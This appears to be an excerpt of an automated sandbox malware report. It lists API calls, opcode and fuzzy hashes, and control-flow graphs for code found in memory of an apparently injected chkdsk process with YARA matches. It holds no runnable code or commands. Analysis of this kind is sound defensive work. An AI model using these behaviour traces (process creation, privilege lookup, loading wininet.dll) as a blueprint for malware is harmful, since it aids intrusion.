                                                                                                                • Snapshot File: hcaresult_4_2_58d0000_chkdsk.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: InitializeThunk
                                                                                                                • String ID:
                                                                                                                • API String ID: 2994545307-0
                                                                                                                • Opcode ID: a8ab32b87a2d60c323a18dece603e261fb716392efef9c33eb550e2ebb7e25ef
                                                                                                                • Instruction ID: bdfd9041311f2eb4907873e5bb63bc9b0d35c347a640605a7bb3888b4d6e398b
                                                                                                                • Opcode Fuzzy Hash: a8ab32b87a2d60c323a18dece603e261fb716392efef9c33eb550e2ebb7e25ef
                                                                                                                • Instruction Fuzzy Hash: 4990027220150402D140B1584448746005987D0311FA5C011B9064554E86598EE56B65
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.4090341330.00000000058D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 058D0000, based on PE: true
                                                                                                                • Associated: 00000004.00000002.4090341330.00000000059F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000004.00000002.4090341330.00000000059FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000004.00000002.4090341330.0000000005A6E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_58d0000_chkdsk.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: InitializeThunk
                                                                                                                • String ID:
                                                                                                                • API String ID: 2994545307-0
                                                                                                                • Opcode ID: 6c92fdb8ec4e8da84319200fc13d425d69cce55325b8069b061e951b8a36708d
                                                                                                                • Instruction ID: 1d315ea0c843c00df2b1998ac78440e3b4740fdf405cfb201b2bbda8ae94025c
                                                                                                                • Opcode Fuzzy Hash: 6c92fdb8ec4e8da84319200fc13d425d69cce55325b8069b061e951b8a36708d
                                                                                                                • Instruction Fuzzy Hash: 3790023220150802D180B158444864A005987D1311FE5C015B4025654DCA158B697BA1
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.4090341330.00000000058D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 058D0000, based on PE: true
                                                                                                                • Associated: 00000004.00000002.4090341330.00000000059F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000004.00000002.4090341330.00000000059FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000004.00000002.4090341330.0000000005A6E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_58d0000_chkdsk.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: InitializeThunk
                                                                                                                • String ID:
                                                                                                                • API String ID: 2994545307-0
                                                                                                                • Opcode ID: 984600ef2573ea83023e32877307980a05d2fff822ba663822c4a2c5c6e070ed
                                                                                                                • Instruction ID: 42487cef88db0899fea30ea37cbff96890a426a3d9f1dd6ee8294245133c53a1
                                                                                                                • Opcode Fuzzy Hash: 984600ef2573ea83023e32877307980a05d2fff822ba663822c4a2c5c6e070ed
                                                                                                                • Instruction Fuzzy Hash: 9790023220554842D140B1584448A46006987D0315FA5C011B4064694D96258E65BB61
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.4090341330.00000000058D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 058D0000, based on PE: true
                                                                                                                • Associated: 00000004.00000002.4090341330.00000000059F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000004.00000002.4090341330.00000000059FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000004.00000002.4090341330.0000000005A6E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_58d0000_chkdsk.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: InitializeThunk
                                                                                                                • String ID:
                                                                                                                • API String ID: 2994545307-0
                                                                                                                • Opcode ID: b59aa1f1c1708f9b5976e8a7e3b95c5f69fd7017b2317cd0a7b3da7b89b9ff0e
                                                                                                                • Instruction ID: a30085e5a64780e8fd94fb824ca13ba4055d47186953be6184a7fc2cc83ee235
                                                                                                                • Opcode Fuzzy Hash: b59aa1f1c1708f9b5976e8a7e3b95c5f69fd7017b2317cd0a7b3da7b89b9ff0e
                                                                                                                • Instruction Fuzzy Hash: 18900262202500034105B1584458616405E87E0211BA5C021F5014590DC52589A16725
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.4090341330.00000000058D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 058D0000, based on PE: true
                                                                                                                • Associated: 00000004.00000002.4090341330.00000000059F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000004.00000002.4090341330.00000000059FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000004.00000002.4090341330.0000000005A6E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_58d0000_chkdsk.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: InitializeThunk
                                                                                                                • String ID:
                                                                                                                • API String ID: 2994545307-0
                                                                                                                • Opcode ID: 1de80a5e801389925d02eb08d8da35b75a1eaef5b0b63abdc40bdf891f5ff07b
                                                                                                                • Instruction ID: b7e144185236ab68e94cb1ff19cf0f84e573247a201a65094cf89d3b7c7fba84
                                                                                                                • Opcode Fuzzy Hash: 1de80a5e801389925d02eb08d8da35b75a1eaef5b0b63abdc40bdf891f5ff07b
                                                                                                                • Instruction Fuzzy Hash: 24900226211500030105F5580748507009A87D53613A5C021F5015550CD62189715721
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.4090341330.00000000058D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 058D0000, based on PE: true
                                                                                                                • Associated: 00000004.00000002.4090341330.00000000059F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000004.00000002.4090341330.00000000059FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000004.00000002.4090341330.0000000005A6E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_58d0000_chkdsk.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: InitializeThunk
                                                                                                                • String ID:
                                                                                                                • API String ID: 2994545307-0
                                                                                                                • Opcode ID: 156fc425959e1375ba06710f7947be0b1c91a74adc90fb170b520295f4c517a5
                                                                                                                • Instruction ID: f384290ba550f930f6d47eeb46453b7dbef80d428f420a1ede6a3671ad314de9
                                                                                                                • Opcode Fuzzy Hash: 156fc425959e1375ba06710f7947be0b1c91a74adc90fb170b520295f4c517a5
                                                                                                                • Instruction Fuzzy Hash: 4990023260560402D100B1584558706105987D0211FB5C411B4424568D87958A616BA2
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 243 505a622-505a623 244 505a625-505a626 243->244 245 505a605-505a607 call 505af20 244->245 246 505a628-505a62b 244->246 250 505a60c-505a621 RtlAllocateHeap 245->250 248 505a600-505a604 246->248 249 505a62d-505a62e 246->249 248->245 249->244 251 505a630-505a647 call 505af20 249->251 253 505a64c-505a661 RtlFreeHeap 251->253
                                                                                                                APIs
                                                                                                                • RtlAllocateHeap.NTDLL(05054526,?,05054C9F,05054C9F,?,05054526,?,?,?,?,?,00000000,00000000,?), ref: 0505A61D
                                                                                                                • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,05043AF8), ref: 0505A65D
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.4088910124.0000000005040000.00000040.80000000.00040000.00000000.sdmp, Offset: 05040000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_5040000_chkdsk.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: Heap$AllocateFree
                                                                                                                • String ID: .z`
                                                                                                                • API String ID: 2488874121-1441809116
                                                                                                                • Opcode ID: 374f2ca75e6bc095ebdedc0adf067193aaed55350ef276d38542cee716077540
                                                                                                                • Instruction ID: efc9105c0a6aa0720be3431d31af687d38cb806aee27951f77288361950bda63
                                                                                                                • Opcode Fuzzy Hash: 374f2ca75e6bc095ebdedc0adf067193aaed55350ef276d38542cee716077540
                                                                                                                • Instruction Fuzzy Hash: 2A018BB53002146FCB24EFA4EC48EAB77ACEF84224B018658FD0A57282D630E814CBF0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 254 5059040-505906f 255 505907b-5059082 254->255 256 5059076 call 505bd00 254->256 257 505915c-5059162 255->257 258 5059088-50590d8 call 505bdd0 call 504ace0 call 5054e40 255->258 256->255 265 50590e0-50590f1 Sleep 258->265 266 5059156-505915a 265->266 267 50590f3-50590f9 265->267 266->257 266->265 268 5059123-5059143 267->268 269 50590fb-5059121 call 5058c60 267->269 270 5059149-505914c 268->270 271 5059144 call 5058e70 268->271 269->270 270->266 271->270
                                                                                                                APIs
                                                                                                                • Sleep.KERNELBASE(000007D0), ref: 050590E8
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.4088910124.0000000005040000.00000040.80000000.00040000.00000000.sdmp, Offset: 05040000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_5040000_chkdsk.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: Sleep
                                                                                                                • String ID: net.dll$wininet.dll
                                                                                                                • API String ID: 3472027048-1269752229
                                                                                                                • Opcode ID: 90854a812cad0410e5fc2fff5d69607a33387ec516fefdf24f336e4ec9475690
                                                                                                                • Instruction ID: d54371f5f12f7783571163dda5eb4bfa465fad0c660bd0e201ad9c3021f800fb
                                                                                                                • Opcode Fuzzy Hash: 90854a812cad0410e5fc2fff5d69607a33387ec516fefdf24f336e4ec9475690
                                                                                                                • Instruction Fuzzy Hash: BC31A4B2600744BBC724DF64D889FABB7F9FB48B10F14841DFA2A5B244D634B550CBA8
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 274 5059036-5059082 call 505bd00 277 505915c-5059162 274->277 278 5059088-50590d8 call 505bdd0 call 504ace0 call 5054e40 274->278 285 50590e0-50590f1 Sleep 278->285 286 5059156-505915a 285->286 287 50590f3-50590f9 285->287 286->277 286->285 288 5059123-5059143 287->288 289 50590fb-5059121 call 5058c60 287->289 290 5059149-505914c 288->290 291 5059144 call 5058e70 288->291 289->290 290->286 291->290
                                                                                                                APIs
                                                                                                                • Sleep.KERNELBASE(000007D0), ref: 050590E8
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.4088910124.0000000005040000.00000040.80000000.00040000.00000000.sdmp, Offset: 05040000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_5040000_chkdsk.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: Sleep
                                                                                                                • String ID: net.dll$wininet.dll
                                                                                                                • API String ID: 3472027048-1269752229
                                                                                                                • Opcode ID: e496e43913db12d330db2d3d3bc69ceed6036fbc41e45b24967febd678b19f7f
                                                                                                                • Instruction ID: 763c354c8a22a75493c220121d1d58e9d6d43df14db0ed69051f222e0f434cfa
                                                                                                                • Opcode Fuzzy Hash: e496e43913db12d330db2d3d3bc69ceed6036fbc41e45b24967febd678b19f7f
                                                                                                                • Instruction Fuzzy Hash: 4021F2B2600304BBCB14DF64D8C9FABB7B8BB48700F14842DEA1A6B240D670A510CBA4
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 300 505a630-505a661 call 505af20 RtlFreeHeap
                                                                                                                APIs
                                                                                                                • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,05043AF8), ref: 0505A65D
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.4088910124.0000000005040000.00000040.80000000.00040000.00000000.sdmp, Offset: 05040000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_5040000_chkdsk.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: FreeHeap
                                                                                                                • String ID: .z`
                                                                                                                • API String ID: 3298025750-1441809116
                                                                                                                • Opcode ID: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
                                                                                                                • Instruction ID: a97ea5d5768a59fc7f28c63bb556dd68e8443f2342023516e6196bd2963b9947
                                                                                                                • Opcode Fuzzy Hash: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
                                                                                                                • Instruction Fuzzy Hash: A4E01AB52002046BD714DF99DC49EA777ACAF88650F014554BD0957241C630E9108AB0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Control-flow Graph

                                                                                                                APIs
                                                                                                                • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 0504836A
                                                                                                                • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 0504838B
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.4088910124.0000000005040000.00000040.80000000.00040000.00000000.sdmp, Offset: 05040000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_5040000_chkdsk.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: MessagePostThread
                                                                                                                • String ID:
                                                                                                                • API String ID: 1836367815-0
                                                                                                                • Opcode ID: b296210bdaa3fd7710cd425ea0fbaac9d580c81dce51cf7669596f9741e02481
                                                                                                                • Instruction ID: 962340247c3231f8704b92b4923b7ed844e0274a29c3607cda4efcf3817dc8fa
                                                                                                                • Opcode Fuzzy Hash: b296210bdaa3fd7710cd425ea0fbaac9d580c81dce51cf7669596f9741e02481
                                                                                                                • Instruction Fuzzy Hash: A16192B0A00209AFDB25DF64EC89FEF77E8EF49704F00496DE909A7240DB7069418FA5
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Control-flow Graph

                                                                                                                APIs
                                                                                                                • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 0504836A
                                                                                                                • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 0504838B
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.4088910124.0000000005040000.00000040.80000000.00040000.00000000.sdmp, Offset: 05040000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_5040000_chkdsk.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: MessagePostThread
                                                                                                                • String ID:
                                                                                                                • API String ID: 1836367815-0
                                                                                                                • Opcode ID: 2e0b671f35c656cf5f67cc1541c9e996106e980b4d3ee3579117b0b437dab0b7
                                                                                                                • Instruction ID: 599f2cefeb507597dca47a9fc256f74d73dd46c2b20072a0a2c85f454337dd40
                                                                                                                • Opcode Fuzzy Hash: 2e0b671f35c656cf5f67cc1541c9e996106e980b4d3ee3579117b0b437dab0b7
                                                                                                                • Instruction Fuzzy Hash: B501FC71B8031877E721AA94AC46FFF776C6F50B51F044524FF04BA1C0D6A4790547E1
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 381 5048310-504831f 382 5048328-504835a call 505c9c0 call 504ace0 call 5054e40 381->382 383 5048323 call 505be20 381->383 391 504835c-504836e PostThreadMessageW 382->391 392 504838e-5048392 382->392 383->382 393 5048370-504838b call 504a470 PostThreadMessageW 391->393 394 504838d 391->394 393->394 394->392
                                                                                                                APIs
                                                                                                                • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 0504836A
                                                                                                                • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 0504838B
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.4088910124.0000000005040000.00000040.80000000.00040000.00000000.sdmp, Offset: 05040000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_5040000_chkdsk.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: MessagePostThread
                                                                                                                • String ID:
                                                                                                                • API String ID: 1836367815-0
                                                                                                                • Opcode ID: f2c01e1818d052739ee633fa7746fb4f3ba52e36b8bad28e88873d1147d52be0
                                                                                                                • Instruction ID: e1db038327b048f368a074747dfc8d4e307ce07695c8de0f3661b71876b42629
                                                                                                                • Opcode Fuzzy Hash: f2c01e1818d052739ee633fa7746fb4f3ba52e36b8bad28e88873d1147d52be0
                                                                                                                • Instruction Fuzzy Hash: 7D01A771B8022877EB21AA94AC06FFF776C6F50A51F044124FF04BA1C1E694790546F5
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,0504F040,?,?,00000000), ref: 050591AC
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.4088910124.0000000005040000.00000040.80000000.00040000.00000000.sdmp, Offset: 05040000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_5040000_chkdsk.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: CreateThread
                                                                                                                • String ID:
                                                                                                                • API String ID: 2422867632-0
                                                                                                                • Opcode ID: 6560531154ad2837b37edeeaea4b84d690999b04cb0e251fa2bfbb41929269a1
                                                                                                                • Instruction ID: 5faaae8aa0522489fb1c41918595e03a5233e99dd93582c1a6ff43dd7025b5fe
                                                                                                                • Opcode Fuzzy Hash: 6560531154ad2837b37edeeaea4b84d690999b04cb0e251fa2bfbb41929269a1
                                                                                                                • Instruction Fuzzy Hash: A541B1B2600705ABD728DF74DC85FEBB3E9BF54714F440519F92A97180DA74B910C7A8
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                • CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 0505A6F4
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.4088910124.0000000005040000.00000040.80000000.00040000.00000000.sdmp, Offset: 05040000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_5040000_chkdsk.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: CreateInternalProcess
                                                                                                                • String ID:
                                                                                                                • API String ID: 2186235152-0
                                                                                                                • Opcode ID: 676bcd88eb09f7b16c334c4a475d118156a6f0fb8279362420abe90a643d7d88
                                                                                                                • Instruction ID: 1e382323bbb6eeb3ec6a74ebc56b006d0a135b3887028bd50cbdf036214ed695
                                                                                                                • Opcode Fuzzy Hash: 676bcd88eb09f7b16c334c4a475d118156a6f0fb8279362420abe90a643d7d88
                                                                                                                • Instruction Fuzzy Hash: C511EAB6200108AFCB14DF99DC85EEB77ADAF8C354F158259FA0D97241C630E915CBA0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 0504AD52
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.4088910124.0000000005040000.00000040.80000000.00040000.00000000.sdmp, Offset: 05040000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_5040000_chkdsk.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: Load
                                                                                                                • String ID:
                                                                                                                • API String ID: 2234796835-0
                                                                                                                • Opcode ID: 343ab67df369899ddd45e960eb1e1cf1cc0407856a101373337c9296a528243f
                                                                                                                • Instruction ID: 0c6b841023a53d768d5dc32ac4b5ecbf45172421ad5cf5943d1cdfdd516bc89f
                                                                                                                • Opcode Fuzzy Hash: 343ab67df369899ddd45e960eb1e1cf1cc0407856a101373337c9296a528243f
                                                                                                                • Instruction Fuzzy Hash: FE015EB6E4020DABDF10DAA0EC45FEEB3B9AB14208F0045A5ED0997280F630EB44CB91
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                • CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 0505A6F4
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.4088910124.0000000005040000.00000040.80000000.00040000.00000000.sdmp, Offset: 05040000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_5040000_chkdsk.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: CreateInternalProcess
                                                                                                                • String ID:
                                                                                                                • API String ID: 2186235152-0
                                                                                                                • Opcode ID: cb4541a9e0b33d5f57d963a66e423995f4d7c7f5581a3adc8fafa1ce299b0682
                                                                                                                • Instruction ID: d77a79dc1dc9b98fb06afc4d81b9d2096d87f36470c238ab8c71d6cca1efe643
                                                                                                                • Opcode Fuzzy Hash: cb4541a9e0b33d5f57d963a66e423995f4d7c7f5581a3adc8fafa1ce299b0682
                                                                                                                • Instruction Fuzzy Hash: A301AFB2210108AFCB58DF89DC81EEB77ADAF8C754F158258FA4DA7250C630EC51CBA0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                • CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 0505A6F4
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.4088910124.0000000005040000.00000040.80000000.00040000.00000000.sdmp, Offset: 05040000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_5040000_chkdsk.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: CreateInternalProcess
                                                                                                                • String ID:
                                                                                                                • API String ID: 2186235152-0
                                                                                                                • Opcode ID: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                                                                                                                • Instruction ID: c4f35a03306f92dad0ee131ff92c741707da1c3429479b1f8a0e83fd4fb2b48f
                                                                                                                • Opcode Fuzzy Hash: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                                                                                                                • Instruction Fuzzy Hash: A501AFB2210108ABCB54DF89DC80EEB77ADAF8C754F158258BA0D97240C630E851CBA4
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,0504F040,?,?,00000000), ref: 050591AC
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.4088910124.0000000005040000.00000040.80000000.00040000.00000000.sdmp, Offset: 05040000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_5040000_chkdsk.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: CreateThread
                                                                                                                • String ID:
                                                                                                                • API String ID: 2422867632-0
                                                                                                                • Opcode ID: cd9894b84da853ed4e4ffa8c984e8b48326dd570691f743a48a256f5fb526518
                                                                                                                • Instruction ID: 45860e2e33c4a31788e51119c77cd9b1157d6d73008849669b4b11f7218f19a2
                                                                                                                • Opcode Fuzzy Hash: cd9894b84da853ed4e4ffa8c984e8b48326dd570691f743a48a256f5fb526518
                                                                                                                • Instruction Fuzzy Hash: 74E06D773802143AE6206599BC02FEBB39C9B91B30F580026FA0DEB2C0D595F40182A8
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                • LookupPrivilegeValueW.ADVAPI32(00000000,?,0504F1C2,0504F1C2,?,00000000,?,?), ref: 0505A7C0
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.4088910124.0000000005040000.00000040.80000000.00040000.00000000.sdmp, Offset: 05040000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_5040000_chkdsk.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: LookupPrivilegeValue
                                                                                                                • String ID:
                                                                                                                • API String ID: 3899507212-0
                                                                                                                • Opcode ID: bc2d18565f718ebad987b8f2750fea723794648b5f4fe306d2c8e7571bd3698f
                                                                                                                • Instruction ID: 2bcaeffb92ecc6c4ab07d79ec418cee19828cea798cae25ee2569c12bfb2eb8e
                                                                                                                • Opcode Fuzzy Hash: bc2d18565f718ebad987b8f2750fea723794648b5f4fe306d2c8e7571bd3698f
                                                                                                                • Instruction Fuzzy Hash: 17E065B5200204AFDB20DF65DC84EDB37A9AF85354F158159FD49AB691D530A8058BB1
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                • RtlAllocateHeap.NTDLL(05054526,?,05054C9F,05054C9F,?,05054526,?,?,?,?,?,00000000,00000000,?), ref: 0505A61D
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.4088910124.0000000005040000.00000040.80000000.00040000.00000000.sdmp, Offset: 05040000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_5040000_chkdsk.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: AllocateHeap
                                                                                                                • String ID:
                                                                                                                • API String ID: 1279760036-0
                                                                                                                • Opcode ID: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
                                                                                                                • Instruction ID: ad78afd5091a85a449bb85232f6bb374f968a0f32ab86cd91ca874c33a51eebe
                                                                                                                • Opcode Fuzzy Hash: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
                                                                                                                • Instruction Fuzzy Hash: 96E046B6200208ABDB14EF99DC45EEB77ACEF88664F118558FE095B241C630F910CBF0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                • LookupPrivilegeValueW.ADVAPI32(00000000,?,0504F1C2,0504F1C2,?,00000000,?,?), ref: 0505A7C0
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.4088910124.0000000005040000.00000040.80000000.00040000.00000000.sdmp, Offset: 05040000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_5040000_chkdsk.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: LookupPrivilegeValue
                                                                                                                • String ID:
                                                                                                                • API String ID: 3899507212-0
                                                                                                                • Opcode ID: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                                                                                                                • Instruction ID: 57ae5c7a1b73334ce717c51c627f981d41dc1fde27632002da240014f45ba7a5
                                                                                                                • Opcode Fuzzy Hash: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                                                                                                                • Instruction Fuzzy Hash: 5FE01AB52002086BDB10DF89DC85EEB37ADAF88650F018154BE0957241C930E8108BF5
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                • SetErrorMode.KERNELBASE(00008003,?,05048D14,?), ref: 0504F6EB
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.4088910124.0000000005040000.00000040.80000000.00040000.00000000.sdmp, Offset: 05040000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_5040000_chkdsk.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: ErrorMode
                                                                                                                • String ID:
                                                                                                                • API String ID: 2340568224-0
